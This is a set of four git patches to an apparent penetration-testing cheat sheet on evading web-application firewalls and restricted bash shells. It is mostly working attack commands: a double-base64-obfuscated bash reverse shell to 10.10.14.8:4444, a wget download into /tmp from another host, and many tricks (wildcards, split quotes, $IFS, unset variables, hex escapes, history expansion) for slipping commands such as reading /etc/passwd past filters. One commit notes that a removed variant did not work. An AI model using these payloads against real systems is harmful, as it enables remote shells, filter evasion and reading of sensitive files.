From 7260cada202a6647ff0205f5bbf5484f4acdd87e Mon Sep 17 00:00:00 2001
From: unKn0wnUser453 <61127067+unKn0wnUser453@users.noreply.github.com>
Date: Tue, 16 Feb 2021 17:44:45 -0500
Subject: [PATCH 1/4] Update bypass-bash-restrictions.md

Add additional tricks, cleanup some things, spell-check, etc.
---
 .../bypass-bash-restrictions.md               | 112 +++++++++---------
 1 file changed, 58 insertions(+), 54 deletions(-)

diff --git a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
index 40e801a5..688dba62 100644
--- a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
+++ b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
@@ -1,88 +1,92 @@
-# Bypass Bash Restrictions
+# WAF Evasion / Bypass Bash Restrictions
 
+## Reverse Shell
+```sh
+# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
+echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|base''64 -d|base''64 -d|b''a''s''h;" | sed 's/ /${IFS}/g'
+echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|base''64${IFS}-d|base''64${IFS}-d|b''a''s''h;
+```
 ## Bypass Paths and forbidden commands
+```sh
+# Question mark binary substitution
+/usr/bin/p?ng # /usr/bin/ping
+nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost
 
-```bash
-#Bash substitudes * fror any possible chat tha refers to a binary in the folder
-/usr/bin/p?ng #This equals /usr/bin/ping
+# Wildcard(*) binary substitution
+/usr/bin/who*mi # /usr/bin/whoami
 
-#Bash substitudes * fror any compatible combination with a binary in the folder
-/usr/bin/who*mi #This equals /usr/bin/whoami
+# Wildcard + local directory arguments
+touch -- -la # -- stops processing options after the --
+ls *
 
-#[chars]
-/usr/bin/n[c] #/usr/bin/nc
+# [chars]
+/usr/bin/n[c] # /usr/bin/nc
 
-#Concatenatipn
-'p'i'n'g #Equals to call ping
-"w"h"o"a"m"i
-\u\n\a\m\e \-\a
+# Quotes / Concatenation
+'p'i'n'g # ping
+"w"h"o"a"m"i # whoami
+\u\n\a\m\e \-\a # uname -a
+ech''o test # echo test
+ech""o test # echo test
+bas''e64 # base64
 
-#Uninitialized variables: A uninitialized variable equals to null (nothing)
-p${u}i${u}n${u}g #Equals to ping, use {} to put the uninitialized variables between valid characteres
-cat$u /etc$u/passwd$u #Use the uninitilized variable without {} before any symbol
+# Uninitialized variables: A uninitialized variable equals to null (nothing)
+cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
+p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters
 
-#Fake commands
-p$(u)i$(u)n$(u)g #Equals to ping but 3 errors trying to exeute "u" are shown
-w`u`h`u`o`u`a`u`m`u`i #Equals to whoami but 5 errors trying to exeute "u" are shown
-
-#Concating strings using history
-!-1 #This will be substitude by the last command executed, and !-2 by the penultimate command
-mi #This will throw an error
-whoa #This will throw an error
-!-1!-2 #This will execute whoami
+# Fake commands
+p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
+w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown
 
+# Concatenation of strings using history
+!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command
+mi # This will throw an error
+whoa # This will throw an error
+!-1!-2 # This will execute whoami
 ```
 
 ## Bypass forbidden spaces
+```sh
+# {form}
+{cat,lol.txt} # cat lol.txt
+{echo,test} # echo test
 
-```bash
-##{form}
-{cat,lol.txt} #This will cat the file
+## IFS - Internal field separator, change " " for any other character ("]" in this case)
+cat${IFS}/etc/passwd # cat /etc/passwd
+cat$IFS/etc/passwd # cat /etc/passwd
 
-##IFS - Internal field separator, change " " for any othe character ("]" in this case)
-#IFS withut modifications
-cat${IFS}/etc/passwd
-cat$IFS/etc/passwd
-
-#Put the command line in a variable and then execute it
+# Put the command line in a variable and then execute it
 IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
-IFS=];b=cat]/etc/passwd;$b #Using 2 ";"
-IFS=,;`cat<<<cat,/etc/passwd` #Using cat twice
-#Other way, just change each space for ${IFS}
+IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
+IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
+#  Other way, just change each space for ${IFS}
 echo${IFS}test
 
-##Using hex format
+# Using hex format
 X=$'cat\x20/etc/passwd'&&$X
 
-##New lines
+# New lines
 p\
 i\
 n\
-g #This 4 lines will equal to ping
+g # This 4 lines will equal to ping
 
-##Undefined variables and !
-$u $u#This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
-uname!-1\-a #This equals to uname -a
+## Undefined variables and !
+$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
+uname!-1\-a # This equals to uname -a
 ```
 
 ## Bypass IPs
-
-```bash
-#Decimal IPs
+```sh
+# Decimal IPs
 127.0.0.1 == 2130706433
 ```
 
-## More
+## References & More
+{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits" %}
 
-Check more possible bypasses here: [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection\#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits)
-
-## References
-
-{% embed url="https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0" %}
+{% embed url="https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" %}
 
 {% embed url="https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0" %}
 
 {% embed url="https://www.secjuice.com/web-application-firewall-waf-evasion/" %}
-
-
-

From 8551e2f6abc64fd66cbf41f973c213ac2cee83cd Mon Sep 17 00:00:00 2001
From: unKn0wnUser453 <61127067+unKn0wnUser453@users.noreply.github.com>
Date: Tue, 16 Feb 2021 18:01:17 -0500
Subject: [PATCH 2/4] Update bypass-bash-restrictions.md

Add IFS / form
---
 .../useful-linux-commands/bypass-bash-restrictions.md       | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
index 688dba62..ac1c942a 100644
--- a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
+++ b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
@@ -3,8 +3,10 @@
 ## Reverse Shell
 ```sh
 # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
-echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|base''64 -d|base''64 -d|b''a''s''h;" | sed 's/ /${IFS}/g'
-echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|base''64${IFS}-d|base''64${IFS}-d|b''a''s''h;
+echo "ec``ho $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
+#ec``ho${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
+echo "{ec``ho $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h}" | sed 's/ /,/g'
+#{ec``ho,WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4,-''d|ba''se''64,-''d|b''a''s''h}
 ```
 ## Bypass Paths and forbidden commands
 ```sh

From 1502d9771afc89d81c697756a6f1bdcb46dd9434 Mon Sep 17 00:00:00 2001
From: unKn0wnUser453 <61127067+unKn0wnUser453@users.noreply.github.com>
Date: Tue, 16 Feb 2021 18:10:55 -0500
Subject: [PATCH 3/4] Update bypass-bash-restrictions.md

Nevermind doesn't work
---
 linux-unix/useful-linux-commands/bypass-bash-restrictions.md | 2 --
 1 file changed, 2 deletions(-)

diff --git a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
index ac1c942a..14f2c56d 100644
--- a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
+++ b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
@@ -5,8 +5,6 @@
 # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
 echo "ec``ho $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
 #ec``ho${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
-echo "{ec``ho $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h}" | sed 's/ /,/g'
-#{ec``ho,WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4,-''d|ba''se''64,-''d|b''a''s''h}
 ```
 ## Bypass Paths and forbidden commands
 ```sh

From 2ddb44301cd8743ac601a0a395f537bb17c9fe71 Mon Sep 17 00:00:00 2001
From: unKn0wnUser453 <61127067+unKn0wnUser453@users.noreply.github.com>
Date: Tue, 16 Feb 2021 18:15:57 -0500
Subject: [PATCH 4/4] Update bypass-bash-restrictions.md

---
 linux-unix/useful-linux-commands/bypass-bash-restrictions.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
index 14f2c56d..0a63a7a6 100644
--- a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
+++ b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
@@ -3,8 +3,8 @@
 ## Reverse Shell
 ```sh
 # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
-echo "ec``ho $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
-#ec``ho${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
+echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
+#echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
 ```
 ## Bypass Paths and forbidden commands
 ```sh